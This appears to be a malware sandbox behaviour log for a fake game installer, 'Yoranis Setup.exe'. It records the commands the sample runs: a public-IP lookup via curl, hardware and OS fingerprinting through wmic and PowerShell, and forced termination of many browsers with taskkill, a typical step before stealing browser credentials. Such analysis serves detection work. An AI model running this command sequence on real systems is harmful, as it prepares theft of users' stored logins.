Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "brave.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "kometa.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "orbitum.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "centbrowser.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "7star.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sputnik.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vivaldi.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "epicprivacybrowser.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "uran.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "yandex.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "iridium.exe")
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'MSEDGE.EXE'
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'FIREFOX.EXE'
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'CHROME.EXE'
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'IEXPLORE.EXE'
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'IEXPLORE.EXE'
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "brave.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "kometa.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "orbitum.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "centbrowser.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "7star.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sputnik.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vivaldi.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vivaldi.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "epicprivacybrowser.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "uran.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'IEXPLORE.EXE'
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "yandex.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "iridium.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "kometa.exe")
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'MSEDGE.EXE'
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'IEXPLORE.EXE'
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'FIREFOX.EXE'
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'IEXPLORE.EXE'
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'CHROME.EXE'
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "7star.exe")
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Steam.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "javaw.exe")
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile read: C:\Users\user\Desktop\Yoranis Setup.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Yoranis Setup.exe "C:\Users\user\Desktop\Yoranis Setup.exe"
Source: C:\Users\user\Desktop\Yoranis Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq YoransSetup.exe" /FO csv | "C:\Windows\system32\find.exe" "YoransSetup.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq YoransSetup.exe" /FO csv
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "YoransSetup.exe"
Source: unknownProcess created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1664 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://api.ipify.org/ --ssl-no-revoke
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversion
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:list
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "Speed"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --mojo-platform-channel-handle=2404 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM kometa.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM uran.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM yandex.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq msedge.exe""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq chrome.exe""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq msedge.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""
